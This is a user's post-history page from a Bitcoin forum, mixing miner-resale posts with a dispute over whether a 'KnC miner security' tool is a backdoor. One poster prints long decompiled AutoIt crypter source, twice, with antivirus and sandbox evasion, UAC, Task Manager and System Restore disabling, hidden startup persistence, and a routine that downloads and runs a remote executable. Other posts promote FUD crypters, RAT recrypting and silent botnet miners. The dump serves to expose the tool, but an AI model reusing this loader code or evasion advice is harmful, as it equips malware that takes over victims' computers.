Search content
Sort by
Showing 20 of 77 results by steve15
The wallet.dat file is like your personal wallet in real life, it proofs you own it.
Your real life wallet has no data about who whas what amount right?
When you backup, you just need that file, nothing else. All the rest gets synced with the blockchain
Your real life wallet has no data about who whas what amount right?
When you backup, you just need that file, nothing else. All the rest gets synced with the blockchain
wow al 3x 40 amp in gebruik hmmmmn is een gigantische mining farm of je hebt groene vingers 
Ik blijf mij nog steeds verbazen dat mensen deze premium willen betalen als je zelf ook gewoon een bestelling kan plaatsen bij Bitmain en hooguit 35 aan invoerrechten en btw betaald, dus max 1.5 btc totaal (1.45btc voor de miner en max 0.05 btc invoerrechten).
Succes met je verkoop.
Groeten
Ik blijf mij nog steeds verbazen dat mensen deze premium willen betalen als je zelf ook gewoon een bestelling kan plaatsen bij Bitmain en hooguit 35 aan invoerrechten en btw betaald, dus max 1.5 btc totaal (1.45btc voor de miner en max 0.05 btc invoerrechten).
Succes met je verkoop.
Groeten
Hallo,
Ik heb laatst nog impuslief een bestelling geplaatst voor 3 Antminer S1's. Deze bestelling is voldaan, betaald, en klaar om vanaf morgen verzonden te worden.
Het probleem is dat ik momenteel geen 1200w meer op mijn woning kan aansluiten, ik loop nu al op 94% van mijn circuit (3x40 amp).
Heeft er iemand interesse in deze over te kopen? Ik zal de invoerkosten betalen, en dan onmiddelijk doorsturen naar het correcte adres.
Stuur mij een PM bij interesse aub.
De vraagprijs (vast) ligt op 1.75btc, invoerkosten en verzendkosten inbegrepen.
Groeten
Ik heb laatst nog impuslief een bestelling geplaatst voor 3 Antminer S1's. Deze bestelling is voldaan, betaald, en klaar om vanaf morgen verzonden te worden.
Het probleem is dat ik momenteel geen 1200w meer op mijn woning kan aansluiten, ik loop nu al op 94% van mijn circuit (3x40 amp).
Heeft er iemand interesse in deze over te kopen? Ik zal de invoerkosten betalen, en dan onmiddelijk doorsturen naar het correcte adres.
Stuur mij een PM bij interesse aub.
De vraagprijs (vast) ligt op 1.75btc, invoerkosten en verzendkosten inbegrepen.
Groeten
35?? Als de douane je pakket niet tegenhoud bedoel je.
Dat zijn de verzendkosten voor DHL.
Mijn laatste bestelling (20 stuks), heb ik 325 PER STUK invoer mogen betalen!!
Pakje tegengehouden door douane, en op 2000 per "computer" geschat...
Hallo,
Ik heb laatst nog impuslief een bestelling geplaatst voor 3 Antminer S1's. Deze bestelling is voldaan, betaald, en klaar om vanaf morgen verzonden te worden.
Het probleem is dat ik momenteel geen 1200w meer op mijn woning kan aansluiten, ik loop nu al op 94% van mijn circuit (3x40 amp).
Heeft er iemand interesse in deze over te kopen? Ik zal de invoerkosten betalen, en dan onmiddelijk doorsturen naar het correcte adres.
Stuur mij een PM bij interesse aub.
De vraagprijs (vast) ligt op 1.75btc, invoerkosten en verzendkosten inbegrepen.
Groeten
Ik heb laatst nog impuslief een bestelling geplaatst voor 3 Antminer S1's. Deze bestelling is voldaan, betaald, en klaar om vanaf morgen verzonden te worden.
Het probleem is dat ik momenteel geen 1200w meer op mijn woning kan aansluiten, ik loop nu al op 94% van mijn circuit (3x40 amp).
Heeft er iemand interesse in deze over te kopen? Ik zal de invoerkosten betalen, en dan onmiddelijk doorsturen naar het correcte adres.
Stuur mij een PM bij interesse aub.
De vraagprijs (vast) ligt op 1.75btc, invoerkosten en verzendkosten inbegrepen.
Groeten
FUD indeed passes malware scans but FUDs change all the time, so its impossible for 1 virus to stay in your system for longer time.
as soon as file gets 2-03 tiems to virustotal the FUD is crushed.
so this is not as simple to spread as people think but of course loads of machines are infected.
as soon as file gets 2-03 tiems to virustotal the FUD is crushed.
so this is not as simple to spread as people think but of course loads of machines are infected.
That's why the RAT client has the option "update server". If you recrypt every two days or so, and with 3 mouseclicks update all your bots, no need to worry about it...
Is there any way to detect this virus? One of the computers at my job suddenly has the CPU light on all day and is very slow. It's probably something else, but if there's a common way to check for this virus I'd like to know.
Check the task manager for high CPU usage. If its poorly made it'll be there. Also check the startup folder and the run registry keys, make sure nothing suspicious is there.
Scan with malwarebytes, should pick anything you can't catch up
Hardly needs to be poorly made - it's not easy to fake the CPU usage, unless you install a rootkit. And even then the sound of your fans blazing is pretty much a dead giveaway.
https://www.google.be/search?q=silent+miner&ie=utf-8&oe=utf-8&rls=org.mozilla:nl:official&client=firefox-a&gws_rd=cr&ei=zcnvUrDkDenV4wTXq4GYAg#q=FUD+silent+miner&rls=org.mozilla:nl:official
There you go. Undetectable silent miners.
Blazing fans? In your dreams. A silent miner takes about 30% of your CPU usage.
Then again, with ten thousands silent miners within a simple botnet, no need for maximum CPU usage
Malware Bytes picks up every Bitcoin Miner I download, even though they are legitimate. I'm sure that it will pick up silent miners as well. Granted that they could have what was mentioned above, but AVs can pick stuff up and add it to the databases pretty fast.
Yes, because it is well known.
FUD crypters are using unique stubs, there are no two equal. Therefore, they are FUD.
You dont have to believe me, just google FUD crypters and virus. You'll see.
It's this kind of thinking that gets people hacked in the first place.
It's as foolish as thinking you need no AV on a Mac or Linux.
Well i created a special tool to scan your network to see if your miners are being exploited remotely or not. This was build as proof of concept tool to show a huge miner exploit.
Because of some script kiddies reverse engineering and decompiling the tool, and posting it on topic with a fake antivirus link, linking to a Java drive by exploit, i locked the topic and asked a admin to remove it.
You can still search the topic in the 'mining' section, called "KnC Miner : Security hacked - UPDATE with TOOL"
On topic:
The main problem is these viruses are NOT detected by your AV because they are crypted to be, what's called, FUD (Fully Undetectable).
They pay big bucs for those crypters to keep them always FUD. Never ever will an AV or malwarebytes pick up a virus that has been 100% FUD crypted.
It takes you only to click a stupid link, like the one user ici_lemmy posted in my topic, to get infected. You can only know if you are infected or not by scanning if your miners are being remotely viewed, or, an instance of cgminer/bfgminer is running silent full hidden on your system.
Never be fooled by thinking "I have a good AV scanner, i'm safe", because you are NOT and never will be.
There are thousands of computers hooked up in botnets to mine without the users knowing it.
Because of some script kiddies reverse engineering and decompiling the tool, and posting it on topic with a fake antivirus link, linking to a Java drive by exploit, i locked the topic and asked a admin to remove it.
You can still search the topic in the 'mining' section, called "KnC Miner : Security hacked - UPDATE with TOOL"
On topic:
The main problem is these viruses are NOT detected by your AV because they are crypted to be, what's called, FUD (Fully Undetectable).
They pay big bucs for those crypters to keep them always FUD. Never ever will an AV or malwarebytes pick up a virus that has been 100% FUD crypted.
It takes you only to click a stupid link, like the one user ici_lemmy posted in my topic, to get infected. You can only know if you are infected or not by scanning if your miners are being remotely viewed, or, an instance of cgminer/bfgminer is running silent full hidden on your system.
Never be fooled by thinking "I have a good AV scanner, i'm safe", because you are NOT and never will be.
There are thousands of computers hooked up in botnets to mine without the users knowing it.
Allright, a couple of things went wrong here.
1: I made a typo claiming i've send 0.9. This should be 0.09
2: All amount smaller then 0.1 are considered as 'donations', thus not being processed.
BITMIXER.IO claims they will process my payment, so if they do, i have to offer my public excuse to them.
Small advice to bitmixer.io: Make this more visible on your website BEFORE users send money.
This being said:
LEGIT SITE
1: I made a typo claiming i've send 0.9. This should be 0.09
2: All amount smaller then 0.1 are considered as 'donations', thus not being processed.
BITMIXER.IO claims they will process my payment, so if they do, i have to offer my public excuse to them.
Small advice to bitmixer.io: Make this more visible on your website BEFORE users send money.
This being said:
LEGIT SITE
Allright, a couple of things went wrong here.
1: I made a typo claiming i've send 0.9. This should be 0.09
2: All amount smaller then 0.1 are considered as 'donations', thus not being processed.
BITMIXER.IO claims they will process my payment, so if they do, i have to offer my public excuse to them.
Small advice to bitmixer.io: Make this more visible on your website BEFORE users send money.
This being said:
LEGIT SITE
1: I made a typo claiming i've send 0.9. This should be 0.09
2: All amount smaller then 0.1 are considered as 'donations', thus not being processed.
BITMIXER.IO claims they will process my payment, so if they do, i have to offer my public excuse to them.
Small advice to bitmixer.io: Make this more visible on your website BEFORE users send money.
This being said:
LEGIT SITE
Moderator please remove this topic
Source code of the project has been sold. I do no longer support the application or it's source in any way.
The buyer claims he will make the source public soon to prevent massive scale attacks.
Thank you.
Source code of the project has been sold. I do no longer support the application or it's source in any way.
The buyer claims he will make the source public soon to prevent massive scale attacks.
Thank you.
As I said, I have no more time to loose with that...
I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...
Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...
I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...
Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...
Just explain why you upload a whole different file, containing over more than 15 DLL files that are NOT in my file.
Explain why your upload contains a Remote Service Application for example.
Your posts are worth nothing dude. Get lost. And see my edits above in my last post.
@steve15 : I'm disapointed by myself because I have not exposed you earlier...
For the analysis, quick answer because I have no more time to loose on this...
OK, so here is my simple full process to expose the scam (so everyone with skills can do it) :
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal
and here are the virustotal results :
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50
Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me !
@admin : you should remove the link to the tool and ban steve
Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability
For the analysis, quick answer because I have no more time to loose on this...
OK, so here is my simple full process to expose the scam (so everyone with skills can do it) :
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal
and here are the virustotal results :
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50
Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me !
@admin : you should remove the link to the tool and ban steve
Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability
You really are an idiot, excuse my language.
Try this:
- Download whatever executable file online, for example Firefox installer.
- Scan with virustotal = 0/50
- Disasemble the exe or rar
- Remove the commented lines
- Modify the script to have the contents of the installer
- Remove some lines
- Send the decrypted file to virustotal = bam, at least 40/50
Every single executable known file in virustotal that gets modified with even 1 bit will get an instant alert.
That is the main reason why you cant fake EXE file assembly without triggering an alert.
Also notice our hashes:
My hash : A5F3453E03DD2E4F356BEC7FB595B799A8EA6BE2C0466CE8550C74E247511870
Your hash: abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3
You scanned a "*.BIN" file. You could have uploaded WHATEVER file you wanted to upload.
Hashcheck is not the same, so it is not the same file, period. That's called faking results.
You file contains at lease 15 DLL files that are not even present in my code!
THIS are the files included:
Try this second method:
Create any .NET project
Google some UPnP / network scanning methods/modules/classes
Compile and send to virustotal = bam, 40/50
So please, you have no idea what you are talking about.
You still failed to post the actual exploit code also.
You post the source from the crypter ITSELF to scare people, but you also fail to post the configuration file for it, so they can see i'm not using ANY of these 'scary' functions.
At most, you can be considered a medium skilled cracker, but that is where this story ends for you ici_lemmy.
Cracking, hacking and decompiling is more than running some cracked tools you found on thepiratebay.
Here are my beliefs
And what if...1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP.
2. You've made fuss about it here.
3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.
Bullshit? Maybe.
Impossible? Don't think so. Time will tell.
IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.
You are right about some parts.
1. If the vulnerability is minor, would KnC upgrade their firmware? It is not just the public IP miners who are in danger
2: If i prepared a malicious software to take control over users miner, would i really opt for an EXE file you think?
Preparing malicious software, and binding it in a simple PDF file, where i claim to describe the method would be far more efficient for that purpose.
People are not suspicious about a PDF, and they need to open it anyway.
Here are my beliefs
ici_lemmy does not even own mining equipment.
Because, instead of trying out if he's rigs are exploitable yes or no, he straight goes to decompiling all files.
Since he made not a single post in this thread before i posted my tool, i believe he was just waiting to try and exploit my tool in order to do nasty stuff with it.
Why else decompile before trying...
Dozens of PM's regarding this kind of "users" (i prefer the term hacker, but what's in a name...) are submitted to me by concerned miners.
For this reason, none of the exploit code can be found inside the main executables.
I also crypted the files to prevent a run while sniffers are active, or virtual enviroments are detected.
This was also posted by me before posting the tool.
As ici_lemmy himself posts, he is disapointed by himself. Why?
Because for the third time in a row he posts decompiled code that does... nothing at all!
This proves to me his eager to get to the core files to abuse them.
If i had a program that was as evil as he tries to picture it, i whould have deleted it by now.
Seems also logic that any AV/AM/FW scanner picked it up by now.
So for the last and final time:
IF YOU ARE PLANNING ON ABUSING THE SOURCE.. GET LOST, YOU CANT.
IF YOU ARE PLANNING ON POSTING BULLSHIT FOR NOT BEING ABLE TO EXTRACT THE SOURCE.. GET LOST.
IF YOU WANT TO TEST YOUR MINING EQUIPEMENT.. FEEL FREE TO DOWNLOAD AND TEST RUN and THEN POST YOUR FINDINGS.
I will no longer reply to any scriptkiddie out there, trying to get hold on the source, tested, approved and verified by KnC itself, to start hacking some machines.
As stated before, this is the kind of behaviour that makes me want to keep all next exploits to myself instead of sharing them.
I would have been better of just mining with your rigs, smiling while reading your posts about it...
Thank you
ici_lemmy does not even own mining equipment.
Because, instead of trying out if he's rigs are exploitable yes or no, he straight goes to decompiling all files.
Since he made not a single post in this thread before i posted my tool, i believe he was just waiting to try and exploit my tool in order to do nasty stuff with it.
Why else decompile before trying...
Dozens of PM's regarding this kind of "users" (i prefer the term hacker, but what's in a name...) are submitted to me by concerned miners.
For this reason, none of the exploit code can be found inside the main executables.
I also crypted the files to prevent a run while sniffers are active, or virtual enviroments are detected.
This was also posted by me before posting the tool.
As ici_lemmy himself posts, he is disapointed by himself. Why?
Because for the third time in a row he posts decompiled code that does... nothing at all!
This proves to me his eager to get to the core files to abuse them.
If i had a program that was as evil as he tries to picture it, i whould have deleted it by now.
Seems also logic that any AV/AM/FW scanner picked it up by now.
So for the last and final time:
IF YOU ARE PLANNING ON ABUSING THE SOURCE.. GET LOST, YOU CANT.
IF YOU ARE PLANNING ON POSTING BULLSHIT FOR NOT BEING ABLE TO EXTRACT THE SOURCE.. GET LOST.
IF YOU WANT TO TEST YOUR MINING EQUIPEMENT.. FEEL FREE TO DOWNLOAD AND TEST RUN and THEN POST YOUR FINDINGS.
I will no longer reply to any scriptkiddie out there, trying to get hold on the source, tested, approved and verified by KnC itself, to start hacking some machines.
As stated before, this is the kind of behaviour that makes me want to keep all next exploits to myself instead of sharing them.
I would have been better of just mining with your rigs, smiling while reading your posts about it...
Thank you
That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...
Yeah, why should I bother run this in a vm
?
Nice game OP... but you loose !
I'm disapointed by meself, I should have seen that earlier...
Code:
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf
Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "\mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc
Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc
Func fakemessage()
$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc
Func mutex()
$scriptname = "lmsqQw.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc
Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc
Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
$autoit3 = "lmsqQw.exe"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc
Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc
Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc
Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc
Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc
Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc
Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc
Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc
Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc
Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]
[SNIP]
-----------------
[SNIP]
Func loop()
While 1
If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf
Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "\mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc
Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc
Func fakemessage()
$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc
Func mutex()
$scriptname = "lmsqQw.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc
Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc
Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
$autoit3 = "lmsqQw.exe"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc
Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc
Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc
Func persistence()
